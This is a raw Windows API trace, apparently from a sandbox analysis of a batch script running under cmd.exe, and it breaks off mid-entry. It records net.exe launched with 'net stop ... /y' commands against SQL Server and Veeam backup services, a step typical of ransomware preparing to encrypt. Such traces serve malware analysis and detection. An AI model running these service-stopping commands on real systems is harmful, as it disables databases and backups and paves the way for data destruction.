[0211.641] GetProcessHeap () returned 0x3e0000 [0211.641] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0211.641] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0211.641] GetProcessHeap () returned 0x3e0000 [0211.641] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0211.641] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.641] GetProcessHeap () returned 0x3e0000 [0211.641] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0211.642] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0211.642] GetProcessHeap () returned 0x3e0000 [0211.642] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0211.642] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.643] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.643] GetLastError () returned 0x2 [0211.643] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.643] GetLastError () returned 0x2 [0211.644] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0211.644] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0211.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.645] GetLastError () returned 0x2 [0211.645] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0211.645] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0211.645] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.646] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0211.646] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0211.646] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0211.646] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.646] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$SBSMONITORING /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$SBSMONITORING /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$SBSMONITORING /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x63c, dwThreadId=0x1ec)) returned 1 [0211.650] CloseHandle (hObject=0x78) returned 1 [0211.650] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.651] GetProcessHeap () returned 0x3e0000 [0211.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.651] GetEnvironmentStringsW () returned 0x3f8408* [0211.651] GetProcessHeap () returned 0x3e0000 [0211.651] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.651] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.651] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0211.780] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0211.780] CloseHandle (hObject=0x74) returned 1 [0211.780] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0211.780] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0211.780] GetProcessHeap () returned 0x3e0000 [0211.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.780] GetEnvironmentStringsW () returned 0x3f8408* [0211.780] GetProcessHeap () returned 0x3e0000 [0211.780] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.781] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.781] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.781] GetProcessHeap () returned 0x3e0000 [0211.781] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.781] GetEnvironmentStringsW () returned 0x3f8408* [0211.781] GetProcessHeap () returned 0x3e0000 [0211.781] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.781] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.781] GetProcessHeap () returned 0x3e0000 [0211.781] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0211.781] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0211.781] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.781] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0211.781] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.781] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0211.781] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.781] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0211.782] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.782] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0211.782] SetConsoleInputExeNameW () returned 0x1 [0211.782] GetConsoleOutputCP () returned 0x1b5 [0211.782] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0211.782] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0211.782] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0211.783] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.783] SetFilePointer (in: hFile=0x74, lDistanceToMove=5032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13a8 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0211.783] GetProcessHeap () returned 0x3e0000 [0211.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0211.783] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.783] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13a8 [0211.783] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x519, lpOverlapped=0x0) returned 1 [0211.783] SetFilePointer (in: hFile=0x74, lDistanceToMove=5064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13c8 [0211.784] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=32, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$VEEAMSQL2012 /y\r\n/y\r\neΓÇ¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 32 [0211.784] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.784] GetFileType (hFile=0x74) returned 0x1 [0211.784] _get_osfhandle (_FileHandle=3) returned 0x74 [0211.784] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13c8 [0211.784] GetProcessHeap () returned 0x3e0000 [0211.784] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0211.784] GetProcessHeap () returned 0x3e0000 [0211.784] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0211.787] _tell (_FileHandle=3) returned 5064 [0211.788] _close (_FileHandle=3) returned 0 [0211.788] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0211.788] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0211.788] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0211.788] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0211.788] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0211.788] _wcsicmp (_String1="net", _String2="CD") returned 11 [0211.788] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0211.788] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0211.788] _wcsicmp (_String1="net", _String2="REN") returned -4 [0211.788] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0211.788] _wcsicmp (_String1="net", _String2="SET") returned -5 [0211.788] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0211.788] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0211.788] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0211.788] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0211.788] _wcsicmp (_String1="net", _String2="MD") returned 1 [0211.788] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0211.788] _wcsicmp (_String1="net", _String2="RD") returned -4 [0211.788] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0211.788] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0211.788] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0211.788] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0211.788] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0211.788] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0211.788] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0211.788] _wcsicmp (_String1="net", _String2="VER") returned -8 [0211.788] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0211.788] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0211.788] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0211.788] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0211.788] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0211.788] _wcsicmp (_String1="net", _String2="START") returned -5 [0211.789] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0211.789] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0211.789] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0211.789] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0211.789] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0211.789] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0211.789] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0211.789] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0211.789] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0211.789] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0211.789] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0211.789] SetErrorMode (uMode=0x0) returned 0x1 [0211.789] GetProcessHeap () returned 0x3e0000 [0211.789] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0211.789] GetProcessHeap () returned 0x3e0000 [0211.789] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0211.790] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.790] GetProcessHeap () returned 0x3e0000 [0211.790] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0211.790] GetProcessHeap () returned 0x3e0000 [0211.790] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0211.790] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0211.790] GetProcessHeap () returned 0x3e0000 [0211.790] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0211.790] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.790] GetProcessHeap () returned 0x3e0000 [0211.790] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0211.791] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0211.791] GetProcessHeap () returned 0x3e0000 [0211.791] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0211.791] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.792] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.792] GetLastError () returned 0x2 [0211.792] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.792] GetLastError () returned 0x2 [0211.793] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.793] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.793] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.793] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.794] GetLastError () returned 0x2 [0211.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.794] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.794] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.795] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0211.795] SetErrorMode (uMode=0x0) returned 0x1 [0211.795] GetProcessHeap () returned 0x3e0000 [0211.795] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0211.795] GetProcessHeap () returned 0x3e0000 [0211.795] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0211.795] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.796] GetProcessHeap () returned 0x3e0000 [0211.796] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0211.796] GetProcessHeap () returned 0x3e0000 [0211.796] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0211.796] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0211.796] GetProcessHeap () returned 0x3e0000 [0211.796] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0211.796] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.796] GetProcessHeap () returned 0x3e0000 [0211.796] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0211.796] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0211.796] GetProcessHeap () returned 0x3e0000 [0211.796] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0211.797] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.797] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.797] GetLastError () returned 0x2 [0211.798] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.798] GetLastError () returned 0x2 [0211.798] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.799] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0211.799] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0211.799] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.799] GetLastError () returned 0x2 [0211.800] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0211.800] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0211.800] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.800] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0211.800] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0211.801] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0211.801] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.801] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$VEEAMSQL2012 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$VEEAMSQL2012 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$VEEAMSQL2012 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x888, dwThreadId=0x820)) returned 1 [0211.805] CloseHandle (hObject=0x74) returned 1 [0211.805] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.805] GetProcessHeap () returned 0x3e0000 [0211.805] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.805] GetEnvironmentStringsW () returned 0x3f8408* [0211.805] GetProcessHeap () returned 0x3e0000 [0211.805] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.806] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.806] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0211.951] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0211.952] CloseHandle (hObject=0x78) returned 1 [0211.952] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0211.952] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0211.952] GetProcessHeap () returned 0x3e0000 [0211.952] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.952] GetEnvironmentStringsW () returned 0x3f8408* [0211.952] GetProcessHeap () returned 0x3e0000 [0211.952] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.952] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.952] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0211.952] GetProcessHeap () returned 0x3e0000 [0211.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.953] GetEnvironmentStringsW () returned 0x3f8408* [0211.953] GetProcessHeap () returned 0x3e0000 [0211.953] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.953] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.953] GetProcessHeap () returned 0x3e0000 [0211.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: 